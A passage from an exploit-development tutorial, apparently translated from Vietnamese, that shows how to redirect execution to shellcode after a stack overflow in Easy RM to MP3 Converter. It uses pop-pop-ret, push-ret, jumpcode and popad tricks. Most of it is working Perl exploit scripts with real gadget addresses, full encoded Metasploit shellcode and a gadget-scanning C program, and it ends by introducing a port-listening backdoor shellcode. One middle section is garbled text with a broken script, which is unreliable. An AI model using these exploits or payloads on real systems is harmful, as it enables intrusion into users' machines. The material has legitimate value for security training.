print "m3u File Created successfully\n";
3.3.2. pop return
If no register points directly to the shellcode, but you can see an address on the stack (the first, second, ... dword at ESP) that does point to it, you can load that address into EIP with a pop ret[17] (if it is the first dword), a pop pop ret (if it is the second), a pop pop pop pop ret, and so on, depending on where on the stack it sits.
In the Easy RM to MP3 example we could make ESP point directly to the shellcode. What if no register points to it?

Well, in that case the address that points to the shellcode may be on the stack. Dump ESP and look at the first few addresses. If one of them points to the shellcode (or to a buffer you control), you can find a pop ret or pop pop ret that will:

take that address off the stack;

jump to the address, which leads you to the shellcode.

The pop ret technique only works when ESP+offset holds an address that points to the shellcode. So when you dump ESP and one of the first addresses points to the shellcode, put a reference to a pop ret (or pop pop ret) into EIP. This discards a number of dwords from the stack (one per pop) and puts the next dword into EIP. If that dword points to the shellcode, you have succeeded.
The second use of pop ret: you control EIP, no register points to the shellcode, but your shellcode can be found at ESP+8. In that case you put the address of a pop pop ret into EIP, and it returns into ESP+8.
Let us build a test. We have 26094 bytes before EIP is overwritten, and 4 more bytes before the position ESP points to (in my case 0x000ff730).
We simulate an address at ESP+8 that points to the shellcode (in reality the shellcode is placed right after it; this is only a test): 26094 A's, then XXXX (ending where ESP points), a breakpoint, 7 NOPs, another breakpoint and many more NOPs. Suppose the shellcode starts at the second breakpoint. The goal is to jump from the first breakpoint to the second, at ESP+8 = 0x000ff738.
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $prependesp = "XXXX";
my $shellcode = "\xcc";
$shellcode = $shellcode . "\x90" x 7;
$shellcode = $shellcode . "\xcc";
$shellcode = $shellcode . "\x90" x 500;
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";

Looking at the stack after the application crashes from the buffer overflow: EIP is overwritten with BBBB, and ESP points to 000ff730, which starts with the first breakpoint, then 7 NOPs, then the second breakpoint, the real start of the shellcode (at address 0x000ff738).
The goal is to get the value at ESP+8 into EIP and so jump to the shellcode. We use the pop ret technique together with the address of a jmp esp to achieve this.
One pop takes 4 bytes off the stack, after which ESP points to 000ff734. A second pop takes 4 more bytes, and ESP points to 000ff738. When the ret executes, the dword at ESP is popped into EIP. So if 000ff738 holds the address of a jmp esp instruction, that is what EIP executes next, and the buffer after 000ff738 (where ESP then points) holds our shellcode.
We therefore need to find a pop,pop,ret somewhere and overwrite EIP with the address of its first instruction, and we must make ESP+8 hold the address of a jmp esp, followed by our shellcode.
First we need the opcodes of pop pop ret, using the assembler in WinDbg:
0:000> a
7c90120e pop eax
pop eax
7c90120f pop ebp
pop ebp
7c901210 ret
ret
7c901211

0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e 58              pop     eax
7c90120f 5d              pop     ebp
7c901210 c3              ret
7c901211 ffcc            dec     esp
7c901213 c3              ret
7c901214 8bff            mov     edi,edi
7c901216 8b442404        mov     eax,dword ptr [esp+4]
7c90121a cc              int     3

So pop pop ret has the opcodes 0x58, 0x5d, 0xc3.

Of course other opcodes can be used as well, for example:

Figure 3.21: Some opcode variants

Now we look for this opcode sequence in the available DLLs. In the first part we discussed application DLLs versus OS DLLs, and I recommended application DLLs because they make the exploit more reliable and avoid dependence on the Windows version. But you need to be sure that the DLL is loaded at the same address every time: sometimes DLLs are rebased, and then an OS DLL such as user32.dll or kernel32.dll may be the better choice.
Open Easy RM to MP3 (without opening any file) and attach WinDbg to the running process. WinDbg lists the loaded modules, OS modules and application modules alike (the lines starting with ModLoad). Here are some of the application's DLLs:
ModLoad: 00ce0000 00d7f000   C:\Program Files\Easy RM to MP3 Converter\MSRMfilter01.dll
ModLoad: 01a90000 01b01000   C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec00.dll
ModLoad: 00c80000 00c87000   C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec01.dll
ModLoad: 01b10000 01fdd000   C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll

Avoid addresses that contain null bytes, because they make the exploit harder. Searching MSRMCcodec00.dll gives several results:
0:014> s 01a90000 l 01b01000 58 5d c3
01ab6a10 58 5d c3 33 c0 5d c3 55-8b ec 51 51 dd 45 08 dc  X].3.].U..QQ.E..
01ab8da3 58 5d c3 8d 4d 08 83 65-08 00 51 6a 00 ff 35 6c  X]..M..e..Qj..5l
01ab9d69 58 5d c3 6a 02 eb f9 6a-04 eb f5 b8 00 02 00 00  X].jj..
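The gadget searches in sections 3.2.4 (jmp esp), 3.3.1 (call esp), 3.3.2 (pop pop ret) and 3.3.3 (push esp; ret) all come down to the same operation: scan a module's bytes for an opcode sequence and reject hits whose address contains a null byte. The following C program is an added example of that scanner; it is not code from the thesis, and it runs over a constructed stand-in image (not a dump of any real DLL) placed at the base address WinDbg reported for MSRMCcodec00.dll, with gadgets planted at made-up offsets:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte patterns of the gadgets used in sections 3.2.4, 3.3.1, 3.3.2 and 3.3.3. */
static const unsigned char JMP_ESP[]      = { 0xff, 0xe4 };   /* jmp esp        */
static const unsigned char CALL_ESP[]     = { 0xff, 0xd4 };   /* call esp       */
static const unsigned char PUSH_ESP_RET[] = { 0x54, 0xc3 };   /* push esp; ret  */

/* An address that is copied as a C string must not contain a zero byte. */
int addr_has_null_byte(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0) return 1;
    return 0;
}

/* Equivalent of WinDbg "s base l size b0 b1 ...", with the null-byte filter applied:
   returns the first hit whose address has no null byte, or 0 if there is none.
   Hits that do contain a null byte are reported and skipped. */
uint32_t find_bytes(const unsigned char *img, size_t img_len, uint32_t base,
                    const unsigned char *pat, size_t pat_len)
{
    for (size_t off = 0; off + pat_len <= img_len; off++) {
        if (memcmp(img + off, pat, pat_len) != 0) continue;
        uint32_t addr = base + (uint32_t)off;
        if (addr_has_null_byte(addr)) {
            printf("  %08x: hit, but the address contains a null byte\n", addr);
            continue;
        }
        return addr;
    }
    return 0;
}

/* pop r32 is a single byte 0x58..0x5f. pop esp (0x5c) would move the stack
   pointer itself, so it is not accepted as one of the two pops. */
static int is_pop_reg(unsigned char b) { return b >= 0x58 && b <= 0x5f && b != 0x5c; }

/* Any "pop reg; pop reg; ret" (0x58 0x5d 0xc3 from the text is one instance). */
uint32_t find_pop_pop_ret(const unsigned char *img, size_t img_len, uint32_t base)
{
    for (size_t off = 0; off + 3 <= img_len; off++) {
        if (!(is_pop_reg(img[off]) && is_pop_reg(img[off + 1]) && img[off + 2] == 0xc3)) continue;
        uint32_t addr = base + (uint32_t)off;
        if (!addr_has_null_byte(addr)) return addr;
    }
    return 0;
}

/* Constructed stand-in for a mapped DLL (offsets and contents are made up). */
#define IMG_BASE 0x01a90000u
#define IMG_SIZE 0x1300u
static unsigned char image[IMG_SIZE];

static void build_sample_image(void)
{
    memset(image, 0xcc, IMG_SIZE);                     /* int3 filler */
    memcpy(image + 0x0010, JMP_ESP, 2);                /* 0x01a90010: rejected, has a 00 byte */
    memcpy(image + 0x1234, JMP_ESP, 2);                /* 0x01a91234: usable */
    image[0x1240] = 0x5c; image[0x1241] = 0x5d; image[0x1242] = 0xc3; /* pop esp; pop ebp; ret: rejected */
    image[0x1250] = 0x58; image[0x1251] = 0x5d; image[0x1252] = 0xc3; /* pop eax; pop ebp; ret */
    memcpy(image + 0x1260, PUSH_ESP_RET, 2);
}

uint32_t demo_jmp_esp(void)      { build_sample_image(); return find_bytes(image, IMG_SIZE, IMG_BASE, JMP_ESP, 2); }
uint32_t demo_call_esp(void)     { build_sample_image(); return find_bytes(image, IMG_SIZE, IMG_BASE, CALL_ESP, 2); }
uint32_t demo_push_esp_ret(void) { build_sample_image(); return find_bytes(image, IMG_SIZE, IMG_BASE, PUSH_ESP_RET, 2); }
uint32_t demo_pop_pop_ret(void)  { build_sample_image(); return find_pop_pop_ret(image, IMG_SIZE, IMG_BASE); }

int main(void)
{
    printf("jmp esp       at %08x\n", demo_jmp_esp());
    printf("call esp      at %08x (0 = not found)\n", demo_call_esp());
    printf("push esp; ret at %08x\n", demo_push_esp_ret());
    printf("pop pop ret   at %08x\n", demo_pop_pop_ret());
    return 0;
}
```

To use it on a real module, read the DLL's mapped bytes (a debugger memory dump) into image and set IMG_BASE to the ModLoad base. The null-byte filter is why the text picks 0x01ccf23a and 0x01ab6a10 but could never use a hit in a module loaded at 00ce0000: every address in that module has a zero high byte.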
Now we can jump to ESP+8. At that position we need the address of a jmp esp (as said, after the ret this address is popped into EIP; at that moment ESP points to our shellcode, which sits right after the jmp esp address).
In the first part we found that 0x01ccf23a points to a jmp esp. Back in the Perl script, we replace the BBBB that overwrites EIP with the address of the pop,pop,ret, followed by 8 bytes of NOPs (simulating ESP+8), then the jmp esp address, then the shellcode.
The buffer looks like this:
[AAAAAAAAAAAAA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcode]
   26094 A's       EIP            8 bytes offset         JMP ESP
                (=POPPOPRET)
The exploit proceeds as follows:
EIP is overwritten with the address of POP POP RET; ESP points to the first byte of the 8-byte offset.
POP POP RET executes; EIP receives the address 0x01ccf23a found at ESP+8, and ESP now points to the shellcode.
EIP holds the address of jmp esp; the second jump is made and the shellcode runs.

Figure 3.22: EIP overwritten with the address of jmp esp

We simulate the shellcode with a breakpoint and some NOPs, so that we can see whether the jumps work. (The XXXX bytes are the 4 bytes between EIP and the position ESP points to, as in the earlier tests.)
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01ab6a10);
my $jmpesp = pack("V", 0x01ccf23a);
my $prependesp = "XXXX";
my $shellcode = "\x90" x 8;
$shellcode = $shellcode . $jmpesp;
$shellcode = $shellcode . "\xcc" . "\x90" x 500;
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
It works; now replace the breakpoint and NOPs after the jmp esp address (ESP+8) with real shellcode.
3.3.3. push return
This method is slightly different from call register: if you cannot find a call reg or jmp reg opcode, you can push the register's value onto the stack and then ret. So you look for a push reg followed by a ret, find the address of that sequence, and overwrite EIP with it.
push ret is similar to call reg. If a register points directly to your shellcode and for some reason you cannot use jmp reg to get there, you can:

put the value of the register on the stack, where it becomes the top of the stack;

ret (take that address off the stack and jump to it).

To do this, overwrite EIP with the address of a push reg / ret sequence in a DLL.
Assuming ESP points directly to the shellcode, you need the opcode of push esp followed by the opcode of ret:
0:000> a
000ff7ae push esp
push esp
000ff7af ret
ret

0:000> u 000ff7ae
<Unloaded_P32.dll>+0xff79d:
000ff7ae 54              push    esp
000ff7af c3              ret

The opcode sequence is 0x54, 0xc3. Search for it:

Figure 3.23: The opcode sequence 0x54, 0xc3

Build the exploit and run it:
my $file = "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack("V", 0x01aa57f6);
my $prependesp = "XXXX";
my $shellcode = "\x90" x 25;
# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE, ">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
3.3.4. jmp [reg + offset]

If a register points into the stack area that holds the shellcode, but not directly at the start of the shellcode, you can also look in the OS or application DLLs for an instruction that adds the required number of bytes to the register and then jumps. I call this method jmp [reg + offset].
So, another technique for dealing with shellcode that starts at an offset from a register (ESP in our example) is to look for a jmp [reg + offset] instruction and overwrite EIP with its address. Suppose we need to jump 8 bytes, as in the previous example; with this technique we jump 8 bytes directly into the shellcode.
We need three things:

Find the opcode of jmp [esp+8].

Find an address that holds this instruction.

Overwrite EIP with that address.

Use WinDbg to find the opcode:

0:014> a
7c90120e jmp [esp + 8]
jmp [esp + 8]
7c901212

0:014> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e ff642408        jmp     dword ptr [esp+8]

The opcode is ff 64 24 08.
Now search the loaded DLLs for this opcode and use its address to overwrite EIP. I could not find this opcode anywhere, though. Of course the search need not be limited to esp+8: an offset larger than 8 also works, in which case we pad with some NOPs to match.
3.3.5. blind return
In the preceding sections ESP pointed to the current top of the stack. A RET instruction pops the last value (4 bytes) off the stack and loads that address into EIP. So if you overwrite EIP with the address of a RET instruction, the value at ESP ends up in EIP. If you face a case where the buffer space after the EIP overwrite is limited but there is plenty of space before it, you can also use a small jump in the part of the buffer after EIP to jump back to the start of the buffer, where the main shellcode is.

The technique consists of these steps:

Overwrite EIP with the address of a RET instruction.

Make sure the first 4 bytes at ESP hold the address of the shellcode.

When the RET executes, those 4 bytes (then the top of the stack) are popped into EIP.

The exploit jumps to the shellcode.

The technique is useful when:

You cannot point EIP to a register (no jump or call instruction can be found).

You control ESP.

To carry it out you need the memory address of the shellcode (a stack address). As usual, to avoid null bytes you normally put the shellcode after EIP; if the shellcode sits at a location whose address has no null bytes, this can work.

Find the address of a RET instruction in a DLL.

Set the first 4 bytes at ESP to the address where the shellcode starts, and overwrite EIP with the address of the RET. Recall from part 1 that ESP pointed to 0x000ff730. This address of course differs between operating system versions (and its leading null byte is exactly the limitation mentioned above), but there is no alternative to hard-coding it. The buffer would look like this:
[26094 A's][address of ret][0x000ff730][shellcode]
3.3.6. Dealing with small buffers
(jumping anywhere with custom jumpcode)
Chng ta ni v cch lm cho EIP nhy ti shellcode ca chng ta. R rng l chng ta thoi
mi t shellcode trong buffer ( phn sau EIP). Nhng nu chng ta khng c ln t
shellcode vo th sao?
Trong v d, chng ta s dng 26094 A ghi ln EIP, v chng ti thy rng ESP tr ti
26094+4bytes, c rt nhiu khng gian pha trc. Nhng nu chng ta ch c 50bytes pha sau.
50bytes lu tr shellcode l khng . V vy, chng ta phi tm xung quanh, v s dng 26094 khi
kch hot trn b nh m.
u tin, chng ta cn tm 26094 bytes ny u trong b nh. Nu khng tm thy n u, rt
kh tham chiu ti. Thc t nu tm thy trong b nh, v mt thanh ghi no tr n th iu
tr nn qu d dng.
Th kim tra Easy RM to MP3, bn c th thy rng 26094 bytes c th thy trong ESP dump:
my $file= test1.m3u;
my $junk= A x 26094;
my $eip = BBBB;

my $preshellcode = X x 54
my $nop = \x90 x 230;
open($FILE,>$file);
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
print m3u File Created successfully\n;

M file test1.m3u chng ta thy 50 X trong ESP. Gi s l khng gian dnh cho shellcode. Tuy
nhin, nhn xung di, chng ta thy rng A bt u ti a ch 000ff849 (=ESP+281).
Khi nhn vo cc thanh ghi khc, chng ta khng thy du vt no ca X v A. V vy, y chnh l n.
Chng ta c th ngy ti ESP thc thi shellcode, nhng chng ta ch c 50bytes. Chng ta s s
dng phn b nh khc trong buffer ca chng ta v tr thp hn, thc t chng ta s nhy ti phn
ni dung ca ESP, s c phn b nh ln vi A.

Hnh 3.24: phn b nh ln vi A


The A's are stored, and there is a way to jump from the X's to the A's. To do so we need the following:
The position of the 26094 A's relative to ESP: 000ff849 (where do the A's shown in the ESP dump actually start?) (So if we want our shellcode inside the A's, we need to know exactly where it must be placed.)
Jumpcode: the code we use to jump from the X's to the A's. This code cannot be larger than 50 bytes (because that is all that is directly available at ESP).
We can find the exact position by guessing, with custom patterns, or with metasploit patterns. Here we use metasploit patterns: generate 1000 characters and substitute them into the perl script, so we need 25101 A's:
my $file = "test1.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa...g8Bg9Bh0Bh1Bh2B";   # pattern shortened in the original
my $junk = "A" x 25101;
my $eip = "BBBB";
my $preshellcode = "X" x 54;
my $nop = "\x90" x 230;
open($FILE, ">$file");
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;
close($FILE);
print "m3u File Created successfully\n";
We see that 000ff849 is part of the pattern; the first 4 characters there are 5Ai6.

Figure 3.25: 000ff849 is part of the pattern

Using the metasploit pattern_offset utility, we find these 4 characters at offset 257. So instead of sending 26094 A's, I will send 257 A's, followed by our shellcode, and the remainder A's again. Even better would be to start with 250 A's, then 50 NOPs, our shellcode, then A's. With NOPs placed before the shellcode, it will work well.
Our perl script will look like this:
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));

my $eip = "BBBB";
my $preshellcode = "X" x 54;
my $nop2 = "\x90" x 230;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$nop2;
close($FILE);
print "m3u File Created successfully\n";
When the application dies, we can see our 50 NOPs starting at 000ff848, followed by the shellcode (0x90 up to 000ff874), and then followed by A's again.

The second thing we need to do is build the jump code. The goal of the jump code is to jump to ESP+281. Jumping to ESP+281 requires: add 281 to the ESP register, then jump esp. 281 = 119h. Do not try to put everything into a single instruction, or the opcode will contain null bytes.
Because there are NOPs in front of the shellcode, it does not have to be perfectly exact. As long as we add 281 (or a little more), it can work. There are 50 bytes for the jump code, so that is not a problem.
Proceed by adding 0x5e (94) three times, then jump to esp; the assembly is:
0:014> a
7c901211 add esp,0x5e
add esp,0x5e
7c901214 add esp,0x5e
add esp,0x5e
7c901217 add esp,0x5e
add esp,0x5e
7c90121a jmp esp
jmp esp
7c90121c

0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
7c901211 83c45e          add     esp,5Eh
7c901214 83c45e          add     esp,5Eh
7c901217 83c45e          add     esp,5Eh
7c90121a ffe4            jmp     esp

The opcodes for the jump code will be:
0x83,0xc4,0x5e,0x83,0xc4,0x5e,0x83,0xc4,0x5e,0xff,0xe4
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));

my $eip = "BBBB";
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\xff\xe4";        # jmp esp

my $nop2 = "\x90" x 10;

my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";
The jumpcode is placed at ESP. When it is called, ESP points into the NOPs (between 00ff842 and 000ff873). The shellcode starts at 000ff874.
Finally, overwrite EIP with a jmp esp; going back to part 1, we can use the address 0x01ccf23a. In summary, this is what happens on overflow:
The real shellcode is placed at the beginning of the string and ends at ESP+300. The real shellcode is preceded by some NOPs, which allow the jump to be off by a few bytes.
EIP is overwritten with the address 0x01ccf23a, which points to a jmp esp.
The data after EIP is overwritten with jumpcode that adds 282 to ESP and jumps there.
When the payload is called, EIP jumps to esp, then jumps to ESP+282, the NOPs are skipped, and the shellcode is executed.
EIP = 0x000ff874 = begin of shellcode
Replace the break with the real shellcode, and replace the A's with NOPs:
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "\x90" x 200;
my $nop = "\x90" x 50;

# windows/exec 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode = \x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49 .
\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56 .
\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41 .
\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42 .
\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d .
\x38\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55\x47 .
\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a\x4f\x4c .
\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a .
\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46 .
\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45 .
\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c .
\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c .
\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44 .
\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c .
\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4b\x39\x51\x4c\x46 .
\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50 .
\x56\x43\x54\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44 .
\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x44 .
\x48\x4d\x59\x4c\x38\x4d\x53\x49\x50\x42\x4a\x46\x30\x45 .
\x38\x4c\x30\x4c\x4a\x45\x54\x51\x4f\x42\x48\x4d\x48\x4b .

\x4e\x4d\x5a\x44\x4e\x50\x57\x4b\x4f\x4b\x57\x42\x43\x43 .
\x51\x42\x4c\x45\x33\x45\x50\x41\x41;

my $restofbuffer = "\x90" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));

my $eip = pack('V', 0x01ccf23a);
my $preshellcode = "X" x 4;
my $jumpcode = "\x83\xc4\x5e" .   # add esp,0x5e
               "\x83\xc4\x5e" .   # add esp,0x5e
               "\xff\xe4";        # jmp esp

my $nop2 = "\x90" x 10;

my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$jumpcode;
close($FILE);
print "m3u File Created successfully\n";
3.3.7. SEH (Structured Exception Handling)
Every application has default exception handlers provided by the OS. So even if the application does not use exception handling itself, you can still try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH makes an exploit more reliable across Windows platforms, but it requires more skill before you can start abusing SEH to build an exploit.
The idea is this: suppose you build an exploit that does not work on a given OS; the payload will crash the application and trigger an exception. So you can combine a normal exploit with an SEH exploit into one reliable exploit. The third part of this tutorial series discusses SEH exploits.
Just remember that the typical characteristic of a stack based overflow is overwriting EIP; it may be possible to reach a basic SEH exploit that allows more reliability, given a larger buffer.
This is a difficult technique, requiring much time and effort to study in detail.
3.3.8. Some other techniques

Popad: this instruction helps us jump to the shellcode quite well. popad (pop all double) takes double words from the stack (ESP) into the general-purpose registers in one go. The registers are loaded in the order EDI, ESI, EBP, EBX, EDX, ECX and EAX. As a result ESP increases after each load; one popad takes 32 bytes from ESP and puts them into the registers in that order.
Popad has opcode 0x61.
Suppose you need to jump 40 bytes and only have a few bytes in which to perform the jump; you can use 2 popads to point ESP at the shellcode (with a few NOP bytes padding the difference 2*32 - 40).
Now we will use Easy RM to MP3 to demonstrate this technique. Still using the old script, we build a buffer that sends 13 X's, followed by some garbage bytes (D's and A's), then our shellcode (NOP+A).
my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 17;
my $garbage = "\x44" x 100;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print "m3u File Created successfully\n";
Open the file with Easy RM to MP3; the application crashes.
Suppose we have 13 X's to use (this is where the popads go) to jump over 100 D's and 160 A's, a total of 260 bytes, to reach our shellcode (which starts with NOPs, then a break, then A's). One popad = 32 bytes; 260 bytes = 9 popads (-28 bytes), so we need to begin the shellcode with NOPs, or start the shellcode 28 bytes further along. In our case the NOPs come first.
First overwrite EIP with a jmp esp (see the previous sections). Then replace the X's with 9 popads, followed by the jmp esp opcode (0xff,0xe4).

my $file = "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250;
my $nop = "\x90" x 50;
my $shellcode = "\xcc";
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = pack('V', 0x01ccf23a);
my $preshellcode = "X" x 4;
$preshellcode = $preshellcode."\x61" x 9;      # 9 x popad
$preshellcode = $preshellcode."\xff\xe4";      # jmp esp
$preshellcode = $preshellcode."\x90\x90\x90";
my $garbage = "\x44" x 100;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
print "Size of buffer : ".length($buffer)."\n";
open($FILE, ">$file");
print $FILE $buffer.$eip.$preshellcode.$garbage;
close($FILE);
print "m3u File Created successfully\n";
After the application crashes and stops at the breakpoint, ESP and EIP are as follows: eip=000ff874 esp=000ff850
The popads work and set ESP to the NOPs of the shellcode; the jmp esp (0xff 0xe4) then makes EIP point to the NOPs. Replace the A's with the real shellcode:
Another way (less preferred, but still possible) is to jump to the shellcode with jumpcode that uses an address (or a register offset). Since the addresses held in registers differ between runs of the program, this approach is not very effective.
So, to hardcode an address or a register offset, you need to find the jump opcode, then use this opcode in the buffer to jump to your real shellcode.
Below are 2 examples to help you find the opcode:
1. jump to 0x12345678
0:000> a
7c90120e jmp 12345678
jmp 12345678
7c901213

0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e e96544a495      jmp     12345678

=> opcode is 0xe9,0x65,0x44,0xa4,0x95

2. jump to ebx+124h
0:000> a
7c901214 add ebx,124
add ebx,124
7c90121a jmp ebx
jmp ebx
7c90121c

0:000> u 7c901214
ntdll!DbgUserBreakPoint+0x2:
7c901214 81c324010000    add     ebx,124h
7c90121a ffe3            jmp     ebx

The opcodes are 0x81,0xc3,0x24,0x01,0x00,0x00 (add ebx,124h) and 0xff,0xe3 (jmp ebx).


Short jumps and conditional jumps.
In case you only need to jump over a few bytes, you can use the short jump technique:
short jump (jmp): opcode 0xeb, followed by the number of bytes to jump. For example, to jump 30 bytes, the opcode is 0xeb,0x1e.
In case you want a conditional jump (taken when a condition is met), you use a conditional (short/near) jump. This technique uses the state of the flags in the EFLAGS register (CF, OF, PF, SF and ZF). If these flags are in a particular state (because of the condition), they can make the jump go to the target you want.
Example: suppose you want to jump 6 bytes; looking at the flags (in ollydbg) and their state, you can use the following opcodes:
If the Zero flag is 1, you can use opcode 0x74, followed by the number of bytes to jump, which is 0x06 in this example.
Opcode table of jump instructions and flags [18]
Based on the table, you can also jump if ECX equals 0. In the SEH case the registers are cleared when the exception occurs, so you can use opcode 0xe3 to jump (ECX = 00000000).
Backward jumps: in case you want to jump backwards (a jump with a negative offset): take the negative number and convert it to hex. The hex dword value is used as the argument of the jump (\xeb or \xe9).
Example: jump back 7 bytes: -7 = FFFFFFF9, so jump -7 would be: \xeb\xf9\xff\xff
Another example: jump back 400 bytes: -400 = FFFFFE70, so jump -400 bytes = \xe9\x70\xfe\xff\xff
(you can see the opcode is 4 bytes long, while a dword is 4 bytes (4 byte limit), so you need to perform multiple jumps by splitting the jump up).


3.4. SHELLCODE BACKDOOR

You can generate a different shellcode and replace the calc shellcode with your new one. But it may not work, because the shellcode may be larger, the memory location may differ, and a longer shellcode increases the risk of containing invalid characters, so it needs to be filtered.
Suppose we want a shellcode that listens on a specific port we can connect to.
The shellcode looks like this:

# windows/exec - 144 bytes
